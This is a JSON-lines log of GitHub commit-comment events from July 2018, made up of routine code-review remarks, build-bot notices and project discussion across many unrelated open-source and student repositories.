{"id":"7918654510","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29595835,"position":null,"line":null,"path":null,"commit_id":"0abd42c06de0b19b98360d04e2982996c42c7530","created_at":"2018-07-04T13:59:45Z","updated_at":"2018-07-04T13:59:45Z","author_association":"MEMBER","body":"ok, will merge to stable branches, thanks!"}},"created_at":"2018-07-04T13:59:45Z"}
{"id":"7918655810","type":"CommitCommentEvent","actor":{"login":"shafaykhan"},"repo":{"name":"probelalkhan/wallpaper-app-admin"},"payload":{"comment":{"id":29595839,"position":null,"line":null,"path":null,"commit_id":"58f17cf1568ec89f470a12e3be62f72e2eb676ba","created_at":"2018-07-04T14:00:00Z","updated_at":"2018-07-04T14:00:00Z","author_association":"NONE","body":"this is right\r\n\r\n{\r\n \"categories\" : {\r\n \"cars\": {\r\n    \r\n      \"desc\" : \"car collection\",\r\n      \"thumbnail\" : \"https://firebasestorage.googleapis.com/v0/b/wallpaperapp-18747.appspot.com/o/cars%2F1530705490530.jpg?alt=media&token=8ca3a420-b7d3-494b-966b-480749bbc73a\"    \r\n    },\r\n  \"cartoon\": {   \r\n       \"desc\" : \"animation images\",\r\n      \"thumbnail\" : \"https://firebasestorage.googleapis.com/v0/b/wallpaperapp-18747.appspot.com/o/cartoon%2F1530705931039.jpg?alt=media&token=faeafafd-b9a9-4188-a76e-9d6a7cdc0f94\"\r\n       \r\n    },\r\n  \"nature\": {\r\n       \"desc\" : \"beautiful natural sceneries\",\r\n      \"thumbnail\" : \"https://firebasestorage.googleapis.com/v0/b/wallpaperapp-18747.appspot.com/o/nature%2F1530706130355.jpg?alt=media&token=7023504c-264f-42a9-8d9a-db8cb8eadd11\"   \r\n    }\r\n \r\n  }\r\n}\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-04T14:00:00Z"}
{"id":"7918656269","type":"CommitCommentEvent","actor":{"login":"mitelg"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29595842,"position":68,"line":68,"path":"themes/Frontend/Bare/frontend/detail/content.tpl","commit_id":"3f0b1b08f0fb94d34cdc274c15a1b108727a987e","created_at":"2018-07-04T14:00:05Z","updated_at":"2018-07-04T14:00:05Z","author_association":"CONTRIBUTOR","body":"hey @timogauweiler \r\nthere is no specific reason. as @tinect already mentioned it was because I just moved the code to another tpl file like in case [L34](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR34)\r\nIn the other cases (adding new tpl files in /content/ ) I just missed to add blocks around the includes. :see_no_evil: \r\nbut as already said, adding new blocks with a PR is no problem :wink: :+1: "}},"created_at":"2018-07-04T14:00:05Z"}
{"id":"7918659858","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29595854,"position":6,"line":64,"path":"addons/web/static/src/js/views/kanban/kanban_record.js","commit_id":"3406b40f03fb143fb4f2424077b9f04ad7d9f6f6","created_at":"2018-07-04T14:00:42Z","updated_at":"2018-07-04T14:00:42Z","author_association":"NONE","body":"render should return a deferred, so that the update case would be handled as well"}},"created_at":"2018-07-04T14:00:42Z"}
{"id":"7918660921","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"BergWerkGIS/VoGIS-Profil-Tool"},"payload":{"comment":{"id":29595856,"position":403,"line":395,"path":"VoGisProfilTool/util/createProfile.py","commit_id":"24a26eb3833a554686c44d17ab1d416ceb484254","created_at":"2018-07-04T14:00:54Z","updated_at":"2018-07-04T14:00:54Z","author_association":"NONE","body":"`p` should probably be initialized to `pnt` here - in case no transformation is necessary…"}},"created_at":"2018-07-04T14:00:54Z"}
{"id":"7918667105","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29595865,"position":12,"line":176,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-04T14:02:02Z","updated_at":"2018-07-04T14:02:02Z","author_association":"COLLABORATOR","body":"replaced logic with GetPropertyAttributeTuples"}},"created_at":"2018-07-04T14:02:02Z"}
{"id":"7918669754","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"AnnaLeticiaAlegria/ProjetoCeu"},"payload":{"comment":{"id":29595869,"position":null,"line":null,"path":null,"commit_id":"d9d50ec054355912e6f956d3c86c6c5bbb0051cb","created_at":"2018-07-04T14:02:32Z","updated_at":"2018-07-04T14:02:32Z","author_association":"COLLABORATOR","body":"Essa formatação tá difícil de ler.\r\nTenta mudar pra algo como\r\n\r\n## Semana\r\n\r\n- item\r\n  - item\r\n- item\r\n  - item"}},"created_at":"2018-07-04T14:02:32Z"}
{"id":"7918670078","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29595870,"position":null,"line":null,"path":null,"commit_id":"3406b40f03fb143fb4f2424077b9f04ad7d9f6f6","created_at":"2018-07-04T14:02:36Z","updated_at":"2018-07-04T14:02:36Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-04T14:02:36Z"}
{"id":"7918670679","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29595872,"position":23,"line":23,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-04T14:02:42Z","updated_at":"2018-07-04T14:02:42Z","author_association":"COLLABORATOR","body":"Used the token idea here as well."}},"created_at":"2018-07-04T14:02:42Z"}
{"id":"7918670821","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29595873,"position":48,"line":3832,"path":"addons/web/static/tests/views/kanban_tests.js","commit_id":"3406b40f03fb143fb4f2424077b9f04ad7d9f6f6","created_at":"2018-07-04T14:02:44Z","updated_at":"2018-07-04T14:02:44Z","author_association":"NONE","body":"blank line"}},"created_at":"2018-07-04T14:02:44Z"}
{"id":"7918673361","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29595879,"position":25,"line":25,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-04T14:03:12Z","updated_at":"2018-07-04T14:03:12Z","author_association":"COLLABORATOR","body":"Simplified with by joining guids and trimming end."}},"created_at":"2018-07-04T14:03:12Z"}
{"id":"7918674426","type":"CommitCommentEvent","actor":{"login":"neikeq"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29595883,"position":null,"line":null,"path":null,"commit_id":"4739cb8c0003a7c35220ce43d8263df617c6fbe0","created_at":"2018-07-04T14:03:23Z","updated_at":"2018-07-04T14:03:23Z","author_association":"MEMBER","body":"Indeed, I forgot that again :sweat: "}},"created_at":"2018-07-04T14:03:23Z"}
{"id":"7918675277","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29595885,"position":42,"line":42,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-04T14:03:32Z","updated_at":"2018-07-04T14:03:32Z","author_association":"COLLABORATOR","body":"replaced as with cast."}},"created_at":"2018-07-04T14:03:32Z"}
{"id":"7918676248","type":"CommitCommentEvent","actor":{"login":"yoonmyung"},"repo":{"name":"yoonmyung/hw1"},"payload":{"comment":{"id":29595888,"position":null,"line":null,"path":null,"commit_id":"1245843e3d2cb003b569943e404cb83de8783cdf","created_at":"2018-07-04T14:03:43Z","updated_at":"2018-07-04T14:03:43Z","author_association":"OWNER","body":"final1 파일이 합친파일"}},"created_at":"2018-07-04T14:03:43Z"}
{"id":"7918678401","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29595892,"position":null,"line":null,"path":null,"commit_id":"99f7fb1c49f22f74491be591576ea3de0b96dd6d","created_at":"2018-07-04T14:04:08Z","updated_at":"2018-07-04T14:04:08Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/jest-monorepo.305`__ :crossed_fingers: [`renovate/jest-monorepo`](https://github.com/streamich/ci-scripts/tree/renovate/jest-monorepo) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/400022565) :tada:"}},"created_at":"2018-07-04T14:04:08Z"}
{"id":"7918683171","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29595903,"position":137,"line":137,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-04T14:04:58Z","updated_at":"2018-07-04T14:04:58Z","author_association":"COLLABORATOR","body":"Will see Mark's advise on the DbContextHelper and probably wrap the initialization in a method."}},"created_at":"2018-07-04T14:04:58Z"}
{"id":"7918683665","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29595905,"position":26,"line":24,"path":"src/main/java/ru/sergey_gusarov/hw2/UserTesting.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:05:04Z","updated_at":"2018-07-04T14:05:04Z","author_association":"NONE","body":"Вот по идее должен загрузиться после этого. `classpath:/aplication.properties` возможно  ещё может помочь, но должно и так."}},"created_at":"2018-07-04T14:05:04Z"}
{"id":"7918685207","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/govuk-developer-docs"},"payload":{"comment":{"id":29595908,"position":null,"line":null,"path":null,"commit_id":"d832a1cf92300bb274520864e1c300bf39ab1926","created_at":"2018-07-04T14:05:21Z","updated_at":"2018-07-04T14:05:21Z","author_association":"MEMBER","body":"No, it is not. I'll write something up."}},"created_at":"2018-07-04T14:05:21Z"}
{"id":"7918686664","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29595912,"position":28,"line":26,"path":"src/main/java/ru/sergey_gusarov/hw2/UserTesting.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:05:38Z","updated_at":"2018-07-04T14:05:38Z","author_association":"NONE","body":"Если static, то `LOG`, но лучше нестатическими делать переменными логгер."}},"created_at":"2018-07-04T14:05:38Z"}
{"id":"7918686921","type":"CommitCommentEvent","actor":{"login":"Sajarii"},"repo":{"name":"Sajarii/Stronka"},"payload":{"comment":{"id":29595913,"position":14,"line":14,"path":"index.html","commit_id":"162a60c3d11d62db508ccbfbbeb8137641982539","created_at":"2018-07-04T14:05:41Z","updated_at":"2018-07-04T14:05:41Z","author_association":"OWNER","body":"Skrypt ukradziony z w3schools, "}},"created_at":"2018-07-04T14:05:41Z"}
{"id":"7918687661","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29595914,"position":27,"line":25,"path":"src/main/java/ru/sergey_gusarov/hw2/UserTesting.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:05:49Z","updated_at":"2018-07-04T14:05:49Z","author_association":"NONE","body":"А почему нет интерфейса?"}},"created_at":"2018-07-04T14:05:49Z"}
{"id":"7918690744","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29595917,"position":69,"line":72,"path":"src/main/java/ru/sergey_gusarov/hw2/UserTesting.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:06:23Z","updated_at":"2018-07-04T14:06:23Z","author_association":"NONE","body":"Ну и на будущее - нужно строчными называть. От этого масса проблем вохникает на windows|linux машинах."}},"created_at":"2018-07-04T14:06:23Z"}
{"id":"7918691097","type":"CommitCommentEvent","actor":{"login":"DarkKnight6499"},"repo":{"name":"kxzxxx/android_build"},"payload":{"comment":{"id":29595919,"position":null,"line":null,"path":null,"commit_id":"3886a2a30608662ef6de250d7ccaf469889a2102","created_at":"2018-07-04T14:06:27Z","updated_at":"2018-07-04T14:06:27Z","author_association":"NONE","body":"Any other changes needed for bison compatibility fix? picked  this change and still the compilation terminates on the same exec error as the compiler is still using the same x86 prebuilt bison lib . "}},"created_at":"2018-07-04T14:06:27Z"}
{"id":"7918692488","type":"CommitCommentEvent","actor":{"login":"elxsalem"},"repo":{"name":"elxsalem/php"},"payload":{"comment":{"id":29595924,"position":null,"line":null,"path":null,"commit_id":"773f55a58d45bd3ae58411d757103da30c35613e","created_at":"2018-07-04T14:06:44Z","updated_at":"2018-07-04T14:06:44Z","author_association":"OWNER","body":"Primeiro Hello World PHP"}},"created_at":"2018-07-04T14:06:44Z"}
{"id":"7918692644","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29595925,"position":23,"line":22,"path":"src/main/java/ru/sergey_gusarov/hw2/repository/QuestionRepositorySourceFileCsv.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:06:45Z","updated_at":"2018-07-04T14:06:45Z","author_association":"NONE","body":"А договривались через конструктор."}},"created_at":"2018-07-04T14:06:45Z"}
{"id":"7918699173","type":"CommitCommentEvent","actor":{"login":"345491382"},"repo":{"name":"345491382/testrepo"},"payload":{"comment":{"id":29595937,"position":null,"line":null,"path":null,"commit_id":"15c220e20ef581b05b4e417bd4dc388409e1c416","created_at":"2018-07-04T14:07:58Z","updated_at":"2018-07-04T14:07:58Z","author_association":"OWNER","body":"test fork..."}},"created_at":"2018-07-04T14:07:58Z"}
{"id":"7918703760","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29595950,"position":87,"line":87,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-04T14:08:49Z","updated_at":"2018-07-04T14:08:49Z","author_association":"CONTRIBUTOR","body":"このクラスは汎用的に使えるようにする意図がないのでusingやめました。"}},"created_at":"2018-07-04T14:08:49Z"}
{"id":"7918703807","type":"CommitCommentEvent","actor":{"login":"Ringlex"},"repo":{"name":"Ringlex/AutomationHomeApp"},"payload":{"comment":{"id":29595951,"position":150,"line":150,"path":"homesystem-0.1/login.py","commit_id":"bbc05ecb4cf3e2994fe995e4a4480a7c30e9d19c","created_at":"2018-07-04T14:08:50Z","updated_at":"2018-07-04T14:08:50Z","author_association":"OWNER","body":"What is it\r\n"}},"created_at":"2018-07-04T14:08:50Z"}
{"id":"7918703894","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"oprinmarius/mesos-jenkins"},"payload":{"comment":{"id":29595952,"position":67,"line":67,"path":"DCOS/Jenkinsfile","commit_id":"44b02fa13783c7becadeab87a5885e752697e886","created_at":"2018-07-04T14:08:51Z","updated_at":"2018-07-04T14:08:51Z","author_association":"NONE","body":"Make a consistent indentation here as well. This is my suggestion:\r\n\r\n```\r\nwithCredentials([usernamePassword(credentialsId: '8d70c82f-6959-49ad-a553-e7906ad47710',\r\n                                  passwordVariable: 'JENKINS_PASSWORD',\r\n                                  usernameVariable: 'JENKINS_USER'),\r\n                 usernamePassword(credentialsId: 'e20c9faa-1d51-46fa-8e69-a027c7f3f8c8',\r\n                                  passwordVariable: 'AZURE_SERVICE_PRINCIPAL_PASSWORD',\r\n                                  usernameVariable: 'AZURE_SERVICE_PRINCIPAL_ID'),\r\n                 usernamePassword(credentialsId: '49dc70d1-13d5-4b52-8944-d62f5a2474e3',\r\n                                  passwordVariable: 'DOCKER_HUB_USER_PASSWORD',\r\n                                  usernameVariable: 'DOCKER_HUB_USER')]) {\r\n```"}},"created_at":"2018-07-04T14:08:51Z"}
{"id":"7918705039","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"oprinmarius/mesos-jenkins"},"payload":{"comment":{"id":29595955,"position":69,"line":69,"path":"DCOS/Jenkinsfile","commit_id":"44b02fa13783c7becadeab87a5885e752697e886","created_at":"2018-07-04T14:09:05Z","updated_at":"2018-07-04T14:09:05Z","author_association":"NONE","body":"same as above."}},"created_at":"2018-07-04T14:09:05Z"}
{"id":"7918705490","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"oprinmarius/mesos-jenkins"},"payload":{"comment":{"id":29595958,"position":72,"line":72,"path":"DCOS/Jenkinsfile","commit_id":"44b02fa13783c7becadeab87a5885e752697e886","created_at":"2018-07-04T14:09:11Z","updated_at":"2018-07-04T14:09:11Z","author_association":"NONE","body":"same as above\r\n"}},"created_at":"2018-07-04T14:09:11Z"}
{"id":"7918706689","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"oprinmarius/mesos-jenkins"},"payload":{"comment":{"id":29595963,"position":101,"line":101,"path":"DCOS/Jenkinsfile","commit_id":"44b02fa13783c7becadeab87a5885e752697e886","created_at":"2018-07-04T14:09:24Z","updated_at":"2018-07-04T14:09:24Z","author_association":"NONE","body":"Fix indentation"}},"created_at":"2018-07-04T14:09:24Z"}
{"id":"7918706768","type":"CommitCommentEvent","actor":{"login":"niisato"},"repo":{"name":"niisato/test"},"payload":{"comment":{"id":29595964,"position":2,"line":2,"path":"aaaaaaaaee","commit_id":"9ff717cca9730c09f94c3382af6b4043b5d2f7d3","created_at":"2018-07-04T14:09:25Z","updated_at":"2018-07-04T14:09:25Z","author_association":"OWNER","body":"追記"}},"created_at":"2018-07-04T14:09:25Z"}
{"id":"7918707003","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29595965,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T14:09:28Z","updated_at":"2018-07-04T14:09:28Z","author_association":"CONTRIBUTOR","body":"Curse of Tongues does apply SPELL_AURA_MOD_CASTING_SPEED, which is not checked in line 1732 (I marked it)"}},"created_at":"2018-07-04T14:09:28Z"}
{"id":"7918707396","type":"CommitCommentEvent","actor":{"login":"marcinczeczko"},"repo":{"name":"Knotx/knotx-example-project"},"payload":{"comment":{"id":29595966,"position":12,"line":11,"path":"README.md","commit_id":"e5ca9f23099fdb32b491cb0c5c8df70553f756c7","created_at":"2018-07-04T14:09:32Z","updated_at":"2018-07-04T14:09:32Z","author_association":"MEMBER","body":"Maybe `maven OR gradle` ?"}},"created_at":"2018-07-04T14:09:32Z"}
{"id":"7918709135","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29595971,"position":7,"line":1731,"path":"src/game/Entities/Creature.cpp","commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T14:09:53Z","updated_at":"2018-07-04T14:09:53Z","author_association":"CONTRIBUTOR","body":"if (spellInfo->EffectApplyAuraName[index] == SPELL_AURA_MOD_CASTING_SPEED)"}},"created_at":"2018-07-04T14:09:53Z"}
{"id":"7918709223","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29595973,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-04T14:09:54Z","updated_at":"2018-07-04T14:09:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T14:09:54Z"}
{"id":"7918712096","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595977,"position":11,"line":11,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T14:10:25Z","updated_at":"2018-07-04T14:10:25Z","author_association":"OWNER","body":"A inicialização dessa variável é feita pela interface gráfica da Unity\r\n"}},"created_at":"2018-07-04T14:10:25Z"}
{"id":"7918712790","type":"CommitCommentEvent","actor":{"login":"jelsner"},"repo":{"name":"jelsner/tor-clusters"},"payload":{"comment":{"id":29595982,"position":null,"line":null,"path":null,"commit_id":"11d2abcfaaa2d93cfbf6d4961a7edbddb545c844","created_at":"2018-07-04T14:10:34Z","updated_at":"2018-07-04T14:10:34Z","author_association":"OWNER","body":"Hi Zoe,\n\nLet's keep a single Rmd file for now.\n\nCan you check to see if the NARR data for 2015 and 2016 are available from\nhere? https://rda.ucar.edu/datasets/ds608.0/\n\nAlso, can you DM @pmarshwx and ask when the 2017 tornadoes will be\navailable in the shapefile format?\n\nBest,\nDr. E.\n\nOn Wed, Jul 4, 2018 at 4:54 PM, Zoe Schroder <notifications@github.com>\nwrote:\n\n> Dr. Elsner,\n>\n>\n> I am not sure why I was getting an error. I reran it today and it worked\n> fine. It was saying empty geometries and when I opened the file it said\n> numeric(0) in certain geometries.\n>\n>\n> Also, do we want to do a base .Rmd file? We can calculate information on\n> the outbreaks (Out.sfdf), outbreak days (OutDays.sfdf), and individual\n> tornadoes (TornData.sfdf). Then save.image of that .Rmd. I think it may be\n> easier so we do not have to rerun everything every time we want to work on\n> it. Instead, we can simply read in the saved image of the workspace. Then\n> we can create a new .Rmd to run calculations and create\n> charts/graphs/tables of the data. I wanted to run this by you before doing\n> it. Let me know what you think. Thanks!\n>\n>\n> Zoe Schroder\n>\n>\n> Doctoral Student\n>\n> Florida State University\n>\n> Department of Geography\n>\n>\n> ________________________________\n> From: James B. Elsner <notifications@github.com>\n> Sent: Wednesday, July 4, 2018 4:07:15 AM\n> To: jelsner/tor-clusters\n> Cc: Zoe Schroder; Author\n> Subject: Re: [jelsner/tor-clusters] Was getting an error on the\n> st_centroid function about no data in certain geometries. (11d2abc)\n>\n>\n> Why was there no data in certain geometries? Did you use data before 1994?\n> I commented your lines since I was not getting this error.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub<https://github.com/\n> jelsner/tor-clusters/commit/11d2abcfaaa2d93cfbf6d4961a7edb\n> ddb545c844#commitcomment-29591306>, or mute the thread<https://github.com/\n> notifications/unsubscribe-auth/Al-F1F9sBbl_FtN6ZIkXGEri6nL8JakOks5uDHezga\n> JpZM4VCIpd>.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jelsner/tor-clusters/commit/11d2abcfaaa2d93cfbf6d4961a7edbddb545c844#commitcomment-29595773>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFNlXewU9Zp7fDw3NFRbkOkBBt_ExRbDks5uDMkYgaJpZM4VCIpd>\n> .\n>\n"}},"created_at":"2018-07-04T14:10:34Z"}
{"id":"7918712877","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595983,"position":29,"line":29,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T14:10:35Z","updated_at":"2018-07-04T14:10:35Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-04T14:10:35Z"}
{"id":"7918713273","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595984,"position":39,"line":39,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T14:10:40Z","updated_at":"2018-07-04T14:10:40Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-04T14:10:40Z"}
{"id":"7918720151","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596001,"position":18,"line":19,"path":"src/main/java/ru/sergey_gusarov/hw2/service/testing/results/ShowResultsServiceImplShell.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:11:58Z","updated_at":"2018-07-04T14:11:58Z","author_association":"NONE","body":"Ну нет, это полноценные зависимости бина - нужно прописывапть  в зависимости, иначе магия с пропертями и зависомстяи не спработает."}},"created_at":"2018-07-04T14:11:58Z"}
{"id":"7918720966","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596007,"position":12,"line":11,"path":"src/main/java/ru/sergey_gusarov/hw2/service/user/PersonServiceImpl.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:12:09Z","updated_at":"2018-07-04T14:12:09Z","author_association":"NONE","body":"ТОгда уж и final"}},"created_at":"2018-07-04T14:12:09Z"}
{"id":"7918721621","type":"CommitCommentEvent","actor":{"login":"JackXu0"},"repo":{"name":"ProofOfLuck/nodes"},"payload":{"comment":{"id":29596012,"position":null,"line":null,"path":null,"commit_id":"eb5e5357d95728f538e073984a9dbecf6131a638","created_at":"2018-07-04T14:12:15Z","updated_at":"2018-07-04T14:12:15Z","author_association":"COLLABORATOR","body":"基本思路是将原先的node文件分成两部分，server跟client： server持续监听与处理其他node的请求， client持续监听处理改node所有者的请求。control程序先通过subprocess.call开启server与client程序，并将他们储存在一个进程池内。测试代码检验了node A像node B发送消息， B再传达给她的peer（提前指定）的功能。现在存在的问题：（1） client 持续监听他的所有者的命令没写；（2）Broadcast 每次都yield了一个websocket,不知道它是新建的还是续用了以前的 （3） 感觉最好还是能把server跟client并在一起，但现在不太会操作"}},"created_at":"2018-07-04T14:12:15Z"}
{"id":"7918722511","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596016,"position":20,"line":20,"path":"src/main/java/ru/sergey_gusarov/hw2/service/user/login/LoginServiceImplShell.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:12:25Z","updated_at":"2018-07-04T14:12:25Z","author_association":"NONE","body":"И это отличный парамтр конструктора."}},"created_at":"2018-07-04T14:12:25Z"}
{"id":"7918725866","type":"CommitCommentEvent","actor":{"login":"HarriOrri"},"repo":{"name":"tutor-web/smileyCoin"},"payload":{"comment":{"id":29596027,"position":214,"line":172,"path":"src/richlistdb.cpp","commit_id":"31f7d00d139d744cb9ce67474f30671cf44f9d8f","created_at":"2018-07-04T14:13:04Z","updated_at":"2018-07-04T14:13:04Z","author_association":"NONE","body":"flott"}},"created_at":"2018-07-04T14:13:04Z"}
{"id":"7918726496","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29596029,"position":50,"line":50,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T14:13:11Z","updated_at":"2018-07-04T14:13:11Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-04T14:13:11Z"}
{"id":"7918727545","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596034,"position":16,"line":18,"path":"src/test/java/ru/sergey_gusarov/hw2/repository/QuestionRepositorySourceFileCsvTest.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:13:23Z","updated_at":"2018-07-04T14:13:23Z","author_association":"NONE","body":"НУ ничгео страшного в этом нет. Но тут нужно исопльзовать spring Runner по-хорошему."}},"created_at":"2018-07-04T14:13:23Z"}
{"id":"7918728683","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"SerPenTeHoK/otus-hw-2"},"payload":{"comment":{"id":29596039,"position":19,"line":21,"path":"src/test/java/ru/sergey_gusarov/hw2/repository/QuestionRepositorySourceFileCsvTest.java","commit_id":"87921e5b0bf7c7a09333438928bc947c2f37769a","created_at":"2018-07-04T14:13:37Z","updated_at":"2018-07-04T14:13:37Z","author_association":"NONE","body":"А методы не делать статическими"}},"created_at":"2018-07-04T14:13:37Z"}
